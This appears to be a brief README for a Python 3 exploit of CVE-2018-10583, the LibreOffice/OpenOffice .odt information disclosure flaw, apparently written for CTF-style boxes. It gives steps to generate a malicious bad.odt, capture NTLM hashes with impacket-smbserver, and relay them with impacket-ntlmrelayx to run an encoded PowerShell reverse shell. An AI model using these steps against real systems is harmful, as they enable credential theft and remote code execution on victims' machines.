Updated python3 exploit for CVE-2018-10583 (LibreOffice/Open Office - '.odt' Information Disclosure)
original credits to : https://www.exploit-db.com/exploits/44564
- Install ezodf module with
pip
orpip3
- Run the exploit with
python3
it will generate a bad.odt file, upload it to the box - And then listen for requests to your smb server
impacket-smbserver share share -smb2support
orsudo impacket-ntlmrelayx --no-http-server -smb2support -t <your_ip> -c "powershell -enc <one liner rever shell>"